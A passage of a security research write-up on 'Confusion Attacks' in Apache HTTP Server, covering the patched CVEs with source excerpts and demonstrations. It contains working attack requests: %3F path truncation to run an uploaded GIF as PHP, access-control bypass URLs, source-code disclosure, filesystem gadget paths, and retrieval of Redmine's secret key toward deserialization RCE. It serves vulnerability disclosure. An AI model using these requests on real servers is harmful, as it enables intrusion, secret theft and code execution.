What’s even more surprising is that these modules also maintain a colossal request_rec structure while processing client HTTP requests. This structure includes all the elements involved in handling HTTP, with its detailed definition available in include/httpd.h. All modules depend on this massive structure for synchronization, communication, and data exchange. As an HTTP request passes through several phases, modules act like players in a game of catch, passing the structure from one to another. Each module even has the ability to modify any value in this structure according to its own preferences!

This type of collaboration is not new from a software engineering perspective. Each module simply focuses on its own task. As long as everyone finishes their work, then the client can enjoy the service provided by Httpd. This approach might work well with a few modules, but what happens when we scale it up to hundreds of modules collaborating — can they really work well together?🤔

Our starting point is straightforward — the modules do not fully understand each other, yet they are required to cooperate. Each module might be implemented by different people, with the code undergoing years of iterations, refactors, and modifications. Do they really still know what they are doing? Even if they understand their own duty, what about other modules’ implementation details? Without any good development standards or guidelines, there must be several gaps that we can exploit!


A Whole New Attack — Confusion Attack

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant, but is crucial for another module, it could affect the latter’s decisions. Furthermore, if the definitions or semantics of the fields are not precise enough, causing ambiguities in how modules understand the same fields, it could lead to potential security risks as well!

From this starting point, we developed three different types of attacks. Because these attacks are all more or less related to the misuse of structure fields, we’ve named this attack surface “Confusion Attack.” The following are the attacks we developed:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we have identified 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01.

As this is a new attack surface arising from Httpd’s architectural design and its internal mechanisms, naturally, the first person to delve into it can find the most vulnerabilities. Thus, I currently hold the most CVEs from Apache HTTP Server 😉. However, the fixes lead to many updates that are not backward compatible. Therefore, patching these issues is not easy for many long-running production servers. If administrators update without careful consideration, they might disrupt existing configurations, causing service downtime. 😨

Now, it’s time to get started with our Confusion Attacks! Are you ready?


🔥 1. Filename Confusion

The first issue stems from confusion regarding the filename field. Literally, r->filename should represent a filesystem path. However, in Apache HTTP Server, some modules treat it as a URL. If, within an HTTP context, most modules consider r->filename as a filesystem path but some others treat it as a URL, this inconsistency can lead to security issues!


⚔️ Primitive 1-1. Truncation

So, which modules treat r->filename as a URL? The first is mod_rewrite, which allows sysadmins to easily rewrite a path pattern to a specified substitution target using the RewriteRule directive:

RewriteRule Pattern Substitution [flags]

The target can be either a filesystem path or a URL. This feature likely exists for user experience. However, this “convenience” also introduces risks. For instance, while rewriting the target paths, mod_rewrite forcefully treats all results as a URL, truncating the path after a question mark %3F. This leads to the following two exploitations.

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;

    // [...]

    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);

        // [...] do the remaining stuff
    }

    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);  // <------- [!!!] Truncate the `r->filename`

    // [...]
}

✔️ 1-1-1. Path Truncation

The first primitive leverages this truncation on the filesystem path. Imagine the following RewriteRule:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

The server would open the corresponding profile based on the username that follows the /user/ path, for example:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats every rewritten result as a URL, even when the target is a filesystem path, the result can be truncated at a question mark, cutting off the trailing /profile.yml, like:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

This is our first primitive — Path Truncation. Let’s pause our exploration of this primitive here for a moment. Although it might seem like a minor flaw for now, remember it— it will reappear in later attacks, gradually tearing open this seemingly little breach! 😜
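The truncation can be modeled in a few lines of Python. This is a simplified sketch, not mod_rewrite's actual implementation: it assumes the rule is matched against the percent-decoded path and that everything after the first `?` in the rewritten result is split off as query arguments. The function name is made up for illustration.

```python
import re
from urllib.parse import unquote

# The example rule: RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
PATTERN = re.compile(r"^/user/(.+)$")
SUBSTITUTION = "/var/user/$1/profile.yml"


def rewrite_and_truncate(raw_path: str) -> str:
    """Model of: regex match -> substitution -> split at the first '?'."""
    decoded = unquote(raw_path)  # assumption: rules see the decoded path
    match = PATTERN.match(decoded)
    if match is None:
        return decoded
    new_uri = SUBSTITUTION.replace("$1", match.group(1))
    # Stand-in for splitout_queryargs(): the part after '?' is dropped
    # from the filename and treated as the query string.
    filename, _, _query = new_uri.partition("?")
    return filename


if __name__ == "__main__":
    print(rewrite_and_truncate("/user/orange"))
    print(rewrite_and_truncate("/user/orange%2Fsecret.yml%3F"))
```

In the second call the attacker-supplied `?` lands in the middle of the substituted path, so the `/profile.yml` suffix ends up on the query side of the split.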

✔️ 1-1-2. Mislead RewriteFlag Assignment

The second exploitation of the truncation primitive is to mislead the assignment of RewriteFlags. Imagine a sysadmin managing websites and their corresponding handlers through the following RewriteRule:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

If a request ends with the .php extension, it adds the corresponding handler for the mod_php (this can also be an Environment Variable or Content-Type; you can refer to the official RewriteRule Flags manual for details).

Since the truncation behavior of the mod_rewrite occurs after the regular expression match, an attacker can use the original rule to apply flags to requests they shouldn’t apply to by using a ?. For example, an attacker could upload a GIF image embedded with malicious PHP code and execute it as a backdoor through the following crafted request:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>

$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
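The ordering problem (flag assigned on the regex match, truncation applied afterwards) can be sketched as follows. This is a simplified model under the assumption that the pattern is tested against the decoded path; the function name and return shape are hypothetical.

```python
import re
from urllib.parse import unquote

# The example rule: RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
PHP_RULE = re.compile(r"^(.+\.php)$")


def apply_handler_rule(raw_path: str):
    """Return (filename, handler) after the modeled rewrite step."""
    decoded = unquote(raw_path)
    match = PHP_RULE.match(decoded)
    if match is None:
        return decoded, None
    # Step 1: the rule matched, so the H= flag is applied.
    handler = "application/x-httpd-php"
    # Step 2: only now is the result split at '?', which changes the file
    # that will be opened but leaves the handler in place.
    filename = match.group(1).partition("?")[0]
    return filename, handler


if __name__ == "__main__":
    print(apply_handler_rule("/upload/1.gif"))
    print(apply_handler_rule("/upload/1.gif%3fooo.php"))
```

The second request ends in `.php` when the pattern is evaluated, yet the file finally served is the uploaded GIF, now carrying the PHP handler.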


⚔️ Primitive 1-2. ACL Bypass

The second primitive of Filename Confusion occurs in mod_proxy. Unlike the previous primitive, which treats targets as a URL in all cases, this time the authentication and access control bypass is caused by the inconsistent semantics of r->filename among the modules!

It actually makes sense for mod_proxy to treat r->filename as a URL, given that the primary purpose of a proxy is to “redirect” requests to other URLs. However, security issues arise when different components interact, especially when most modules treat r->filename as a filesystem path by default. Imagine you use file-based access control, and now mod_proxy treats r->filename as a URL; this inconsistency can lead to an access control or authentication bypass!

A classic example is when sysadmins use the Files directive to restrict a single file, like admin.php:

<Files "admin.php">
    AuthType Basic
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

This type of configuration can be bypassed directly under the default PHP-FPM installation! It’s also worth mentioning that this is one of the most common ways to configure authentication in Apache HTTP Server! Suppose you visit a URL like this:

http://server/admin.php%3Fooo.php

First, in the HTTP lifecycle at this URL, the authentication module will compare the requested filename with the protected files. At this point, the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module will assume that the current request does not require authentication. However, the PHP-FPM configuration is set to forward requests ending in .php to the mod_proxy using the SetHandler directive:

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

The mod_proxy will rewrite r->filename to the following URL and call the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Since the backend receives the filename in a strange format, PHP-FPM has to handle this behavior specially. The logic of this handling is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p = 0;
    }
}

As you can see, PHP-FPM first normalizes the filename and splits it at the question mark ? to extract the actual file path for execution (which is /var/www/html/admin.php). This leads to the bypass, and basically, all authentications or access controls based on the Files directive for a single PHP file are at risk when running together with PHP-FPM!😮
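To make the mismatch concrete, here is a small Python port of the normalization shown above, next to a deliberately naive stand-in for the Files check. The `files_directive_matches` helper is an assumption for illustration (it only compares the last path component for equality and ignores wildcards); it is not Httpd's real matching code.

```python
import posixpath

APACHE_PROXY_FCGI_PREFIX = "proxy:fcgi://"


def fpm_script_path(script_filename: str) -> str:
    """Port of the fpm_main.c snippet: strip prefix and host, cut at '?'."""
    prefix_len = len(APACHE_PROXY_FCGI_PREFIX)
    if script_filename[:prefix_len].lower() != APACHE_PROXY_FCGI_PREFIX:
        return script_filename
    slash = script_filename.find("/", prefix_len)  # skip host and port
    if slash != -1:
        script_filename = script_filename[slash:]
    return script_filename.partition("?")[0]  # ignore the "query string"


def files_directive_matches(protected_name: str, r_filename: str) -> bool:
    """Naive model of <Files "name">: compare the last path component."""
    return posixpath.basename(r_filename) == protected_name


if __name__ == "__main__":
    r_filename = "/var/www/html/admin.php?ooo.php"
    proxied = "proxy:fcgi://127.0.0.1:9000" + r_filename
    print(files_directive_matches("admin.php", r_filename))
    print(fpm_script_path(proxied))
```

The two functions disagree about what the request refers to: the access check sees a file named `admin.php?ooo.php`, while the backend ends up executing `/var/www/html/admin.php`.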

Many potentially risky configurations can be found on GitHub, such as phpinfo() restricted to internal network access only:

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

Adminer blocked by .htaccess:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

Protected xmlrpc.php:

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

CLI tools prevented from direct access:

<Files "cron.php">
    Deny from all
</Files>

Through an inconsistency in how the authentication module and mod_proxy interpret the r->filename field, all the above examples can be successfully bypassed with just a ?.


🔥 2. DocumentRoot Confusion

The next attack we’re diving into is the confusion based on DocumentRoot! Let’s consider this Httpd configuration for a moment:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

When you visit the URL http://server/html/about, which file do you think Httpd actually opens? Is it the one under the root directory, /about.html, or is it from the DocumentRoot at /var/www/html/about.html?

The answer is — it accesses both paths. Yep, that’s our second Confusion Attack. For any[1]RewriteRule, Apache HTTP Server always tries to open both the path with DocumentRoot and without it! Amazing, right? 😉

[1] Located within Server Config or VirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

    if (!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {    // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);    // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}
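The decision made by this snippet can be approximated in Python. The sketch below is a hedged model only: it assumes that `prefix_stat` succeeds when the first segment of the rewritten path exists on the filesystem (as the CVE-2024-38475 description suggests), it ignores the `uri_reduced` case, and it takes the existence check as an injected callable so the example does not touch the real filesystem. All names are hypothetical.

```python
import posixpath
from typing import Callable


def resolve_rewritten_path(
    rewritten: str,
    document_root: str,
    exists: Callable[[str], bool],
) -> str:
    """Pick the path without DocumentRoot if its first segment exists."""
    # First segment of an absolute path, e.g. "/usr" for "/usr/lib/x".
    first_segment = "/" + rewritten.lstrip("/").split("/", 1)[0]
    if exists(first_segment):
        # [1] modeled prefix_stat() success: use the path as-is.
        return rewritten
    # [2] otherwise fall back to prefixing the DocumentRoot.
    return posixpath.join(document_root, rewritten.lstrip("/"))


if __name__ == "__main__":
    fake_fs = {"/usr", "/etc", "/var"}
    check = lambda path: path in fake_fs
    print(resolve_rewritten_path("/about.html", "/var/www/html", check))
    print(resolve_rewritten_path("/usr/lib/cgi-bin/download.cgi", "/var/www/html", check))
```

With a real server one would pass `os.path.exists` instead of the fake lookup; the point of the model is only that an attacker-controlled prefix decides which branch is taken.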

Most of the time, the version without DocumentRoot doesn’t exist, so Apache HTTP Server goes for the version with the DocumentRoot. But this behavior already lets us “intentionally” access paths outside the Web Root. If we can control the prefix of the RewriteRule target, couldn’t we access any file on the system? That’s the spirit of our second Confusion Attack! You can find numerous problematic configurations on GitHub, and even the examples from the official Apache HTTP Server documentation are vulnerable to attacks:

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

Other RewriteRules are also affected, such as rules based on caching needs or hiding file extensions:

RewriteRule "^/html/(.*)$" "/$1.html"

The rule that tries to save bandwidth by opting for compressed versions of static files:

RewriteRule "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

The rule redirecting old URLs to the main site:

RewriteRule "^/oldwebsite/(.*)$" "/$1"

The rule returning a 200 OK for all CORS preflight requests:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

Theoretically, as long as the target prefix of a RewriteRule is controllable, we can access nearly the entire filesystem. But from the real-world cases above, extensions like .html and .gz are the restrictions that keep us from being truly free. So, can we access files other than .html? Remember the Path Truncation primitive from Filename Confusion earlier? By combining these two primitives, we can freely access arbitrary files on the filesystem!

The following demonstrations are all based on this unsafe RewriteRule:

RewriteEngine On
RewriteRule "^/html/(.*)$" "/$1.html"


⚔️ Primitive 2-1. Server-Side Source Code Disclosure

Let’s introduce the first primitive of DocumentRoot Confusion — Arbitrary Server-Side Source Code Disclosure!

Since Apache HTTP Server decides whether to treat a file as a server-side script based on the current directory or virtual host configuration, accessing the target via an absolute path can confuse Httpd’s logic, causing it to leak contents that should have been executed as code.

✔️ 2-1-1. Disclose CGI Source Code

Starting with the disclosure of server-side CGI source code, since mod_cgi binds the CGI folder to a specified URL prefix via ScriptAlias, directly accessing a CGI file using its absolute path can leak its source code due to the change of URL prefix.

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
 # # the source code of download.cgi

✔️ 2-1-2. Disclose PHP Source Code

Next is the disclosure of server-side PHP source code. PHP has numerous use cases, and if a PHP environment is applied only to specific directories or virtual hosts (which is common in web hosting), accessing PHP files through a virtual host that doesn’t support PHP can disclose the source code!

For example, www.local and static.local are two websites hosted on the same server; www.local allows PHP execution while static.local only serves static files. Hence, you can disclose sensitive info from config.php like this:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php


⚔️ Primitive 2-2. Local Gadgets Manipulation!

Next up is our second primitive — Local Gadgets Manipulation.

First, when we talked about “accessing any file on the filesystem,” did you wonder: “Hey, could an unsafe RewriteRule access /etc/passwd?” The answer is Yes, and also no. What?

Technically, the server does check if /etc/passwd exists, but Apache HTTP Server’s built-in access control blocks our access. Here’s a snippet from Apache HTTP Server’s configuration template:

<Directory />
    AllowOverride None
    Require all denied
</Directory>

You’ll notice it defaults to blocking access to the root directory / (Require all denied). So our “arbitrary file access” ability seems a bit less “any.” Does that mean the show’s over? Not really! We have already broken the assumption that only the DocumentRoot is accessible, which is a significant step forward!

A closer inspection of different Httpd distributions reveals that Debian/Ubuntu operating systems by default allow /usr/share:

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

So, the next step is to “squeeze” every possibility out of this directory. All available resources, such as existing tutorials, documentation, unit test files, and even libraries for languages like PHP and Python, including PHP modules, could become targets for our abuse!

P.S. Of course, the exploitation here is based on the Httpd distributed by Ubuntu/Debian operating systems. However, in practice, we have also found that some applications remove the Require all denied line from the root directory, allowing direct access to /etc/passwd.
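
The effect of the two Directory blocks quoted above can be approximated as a most-specific-prefix lookup. The Python sketch below is a simplification under that assumption (real Httpd merges every matching section and evaluates the full authorization configuration); the `RULES` table and the `is_allowed` helper are hypothetical names introduced for illustration.

```python
from pathlib import PurePosixPath

# Simplified stand-in for the two <Directory> blocks quoted above.
RULES = {
    "/": False,           # Require all denied
    "/usr/share": True,   # Require all granted
}


def is_allowed(path: str) -> bool:
    """Return the verdict of the most specific directory rule covering path."""
    target = PurePosixPath(path)
    best_depth, verdict = -1, False
    for directory, granted in RULES.items():
        candidate = PurePosixPath(directory)
        if target == candidate or candidate in target.parents:
            depth = len(candidate.parts)
            if depth > best_depth:
                best_depth, verdict = depth, granted
    return verdict


print(is_allowed("/etc/passwd"))
print(is_allowed("/usr/share/doc/websocketd/examples/php/dump-env.php"))
```

In this model, only paths below /usr/share pass the check, which matches the observation that the hunt for gadgets starts there.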

✔️ 2-2-1. Local Gadget to Information Disclosure

Let’s hunt for potentially exploitable files in this directory. First off, if the target Apache HTTP Server has the websocketd service installed, the default package includes an example PHP script dump-env.php under /usr/share/doc/websocketd/examples/php/. If there’s a PHP environment on the target server, this script can be accessed directly to leak sensitive environment variables.

Additionally, if the target has services like Nginx or Jetty installed, though /usr/share is theoretically a read-only copy for package installation, these services still place their default Web Roots under /usr/share, making it possible to leak sensitive web application information, such as the web.xml in Jetty.

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Here’s a simple demonstration using setup.php from the Davical package, which exists as a read-only copy, to leak contents of phpinfo().

✔️ 2-2-2. Local Gadget to XSS

Next, how to turn this primitive into XSS? On the Ubuntu Desktop environment, LibreOffice, an open-source office suite, is installed by default. We can leverage the language switch feature in the help files to achieve XSS.

Path: /usr/share/libreoffice/help/help.html

var url = window.location.href;
var n = url.indexOf('?');
if (n != -1) {
    // the URL came from LibreOffice help (F1)
    var version = getParameterByName("Version", url);
    var query = url.substr(n + 1, url.length);
    var newURL = version + '/index.html?' + query;
    window.location.replace(newURL);
} else {
    window.location.replace('latest/index.html');
}

Thus, even if the target hasn’t deployed any web application, we can still create XSS using an unsafe RewriteRule through files that come within the operating system.
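
To see why this script is exploitable, the following Python sketch mirrors how help.html builds newURL. The `getParameterByName` helper is not shown in the snippet, so its behavior here (returning the raw value of the Version query parameter) is an assumption, and the `javascript:` value is a hypothetical payload chosen for illustration.

```python
from urllib.parse import parse_qs


def build_new_url(url: str) -> str:
    """Mirror of the redirect logic in help.html (simplified)."""
    n = url.find("?")
    if n == -1:
        return "latest/index.html"
    query = url[n + 1:]
    # Assumed behavior of getParameterByName("Version", url)
    version = parse_qs(query).get("Version", [""])[0]
    return version + "/index.html?" + query


benign = build_new_url("http://server/help.html?Version=7.3")
hostile = build_new_url("http://server/help.html?Version=javascript:alert(1)//")
print(benign)
print(hostile)
```

Because the Version value becomes the very beginning of the string passed to window.location.replace(), a value that starts with a script URL scheme controls where the browser navigates.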

✔️ 2-2-3. Local Gadget to LFI

What about arbitrary file reading? If the target server has PHP or frontend packages installed, like JpGraph, jQuery-jFeed, or even WordPress or Moodle plugins, their tutorials or debug consoles can become our gadgets, for example:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Here’s a simple example exploiting proxy.php from jQuery-jFeed to read /etc/passwd:

✔️ 2-2-4. Local Gadget to SSRF

Finding an SSRF vulnerability is also a piece of cake. For instance, MagpieRSS ships a magpie_debug.php file, which is a fabulous gadget to exploit:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

So, can we achieve RCE? Hold on, let’s take it step by step! First, this primitive lets us reapply all known attacks. For example, an old version of PHPUnit left behind by development or third-party dependencies can be exploited directly with CVE-2017-9841 to execute arbitrary code. Or phpLiteAdmin, installed as a read-only copy, ships with the default password admin. By now, you should see the vast potential of Local Gadgets Manipulation. What remains is to discover even more powerful and universal gadgets!


⚔️ Primitive 2-3. Jailbreak from Local Gadgets

You might ask: “Can’t we really break out of /usr/share?” Of course we can, and that brings us to our third primitive: Jailbreak from /usr/share!

In Debian/Ubuntu distributions of Httpd, the FollowSymLinks option is explicitly enabled by default. Even in non-Debian/Ubuntu versions, Apache HTTP Server also implicitly allows Symbolic Links by default.

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>
✔️ 2-3-1. Jailbreak from Local Gadgets

So, any package that has a Symbolic Link in its installation directory pointing outside of /usr/share can become a stepping-stone to access more gadgets for further exploitation. Here are some useful Symbolic Links we’ve discovered so far:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
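
Candidates like the ones listed above can be enumerated on a test machine with a short script. The Python sketch below is one possible approach, not the method used in the research: the `escaping_symlinks` helper is a hypothetical name, and it simply reports every symbolic link under a root directory whose resolved target lies outside that root.

```python
import os


def escaping_symlinks(root: str):
    """Yield (link, target) for symlinks under root that resolve outside root."""
    root_real = os.path.realpath(root)
    # os.walk does not descend into symlinked directories by default,
    # but it still lists them in dirnames, so both lists are checked.
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            link = os.path.join(dirpath, name)
            if not os.path.islink(link):
                continue
            target = os.path.realpath(link)
            if os.path.commonpath([root_real, target]) != root_real:
                yield link, target
```

Calling `list(escaping_symlinks("/usr/share"))` on a Debian/Ubuntu test box would print each link together with where it lands; which links exist depends entirely on the installed packages.
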
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

To wrap up our jailbreak primitive, let’s showcase how to perform an RCE using a double-hop Symbolic Link in Redmine. In the default installation of Redmine, there’s an instances/ folder pointing to /var/lib/redmine/, and within /var/lib/redmine/, the default/config/ folder points to the /etc/redmine/default/ directory, which holds Redmine’s database setting and secret key.

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/default/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

Thus, through an insecure RewriteRule and two Symbolic Links, we can easily access the application secret key used by Redmine:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

And since Redmine is a Ruby on Rails application, the content of secret_key.txt is actually the key used for signing and encrypting. The next step should be familiar to anyone who has attacked RoR before: embed a malicious Marshal object, signed and encrypted with the known key, into a cookie, and achieve remote code execution through Server-Side Deserialization!


🔥 3. Handler Confusion

The final attack I’m going to introduce is the confusion based on Handler. This attack also leverages a piece of technical debt that has been left over from the legacy architecture of Apache HTTP Server. Let’s quickly understand this technical debt through an example — if today you want to run the classic mod_php on Apache HTTP Server, which of the following two directives do you use?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

The answer is — both can correctly get PHP running! Here are the two directive syntaxes, and you can see that not only are the usages similar, but even the effects are exactly the same. Why did Apache HTTP Server initially design two different directives doing the same thing?

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

Actually, handler-name and media-type represent different fields within Httpd’s internal structure, corresponding to r->handler and r->content_type, respectively. The fact that users can use them interchangeably without realizing it is thanks to a piece of code that has been in Apache HTTP Server since its early development in 1996:

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r)
{
    // [...]
    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p = ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2 = '\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

You can see that before entering the ap_run_handler(), if r->handler is empty, the content of the r->content_type is used as the final module handler. This is also why AddType and AddHandler have the identical effect, because the media-type is eventually converted into the handler-name before handling. So, our third Handler Confusion is mainly developed around this behavior.
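
The fallback can be restated in a few lines of Python. This is a sketch of the logic in the snippet above, not Httpd code: the `Request` class and `resolve_handler` function are hypothetical names, and `DEFAULT_HANDLER` is a placeholder value for AP_DEFAULT_HANDLER_NAME.

```python
from dataclasses import dataclass
from typing import Optional

DEFAULT_HANDLER = "default-handler"  # placeholder for AP_DEFAULT_HANDLER_NAME


@dataclass
class Request:
    handler: Optional[str] = None
    content_type: Optional[str] = None


def resolve_handler(r: Request) -> str:
    """Pick the handler the way the legacy fallback does."""
    if not r.handler:
        if r.content_type:
            # Drop media-type parameters such as "; charset=utf-8",
            # then strip the trailing spaces left before the ';'.
            r.handler = r.content_type.split(";", 1)[0].rstrip(" ")
        else:
            r.handler = DEFAULT_HANDLER
    return r.handler


print(resolve_handler(Request(content_type="application/x-httpd-php")))
print(resolve_handler(Request(handler="server-status", content_type="text/html")))
```

The first call shows why AddType is enough to run PHP: with no handler assigned, the media type itself is used as the handler name. The second shows that an explicitly assigned handler always wins.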


⚔️ Primitive 3-1. Overwrite the Handler

By understanding this conversion mechanism, the first primitive is — Overwrite the Handler. Imagine if today the target Apache HTTP Server uses AddType to run PHP.

AddType application/x-httpd-php  .php

In the normal process, when http://server/config.php is accessed, mod_mime copies the corresponding content into r->content_type during the type_checker phase, based on the file extension configured by AddType. Since r->handler is not assigned during the entire HTTP lifecycle, ap_invoke_handler() treats r->content_type as the handler, ultimately calling mod_php to handle the request.

However, what happens if any module “accidentally” overwrites r->content_type before reaching ap_invoke_handler()?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

The first exploitation of this primitive is to disclose arbitrary PHP source code by the “accidentally-overwrite”. This technique was first mentioned by Max Dmitriev in his research presented at ZeroNights 2021 (kudos to him!), and you can check his slides here:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev observed that by sending an incorrect Content-Length, the remote Httpd server would trigger an unexpected error and inadvertently return the source code of the PHP script. Upon investigating the process, he discovered that the issue was due to ModSecurity not properly handling the AP_FILTER_ERROR return value while using the Apache Portable Runtime (APR) library, leading to a double response. When the error occurs, Httpd attempts to send out an HTML error message, accidentally overwriting r->content_type with text/html.

Because ModSecurity did not properly handle the return values, the internal HTTP lifecycle that should have stopped continued. This “side effect” also overwrote the originally added Content-Type, resulting in files that should have been processed as PHP being treated as plain documents, exposing its source code and sensitive settings. 🤫

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
...
<?php phpinfo();?>

In theory, all configurations based on Content-Type are vulnerable to this type of attack, so apart from the php-cgi paired with mod_actions shown in Max’s slides, pure mod_php coupled with AddType is also affected.

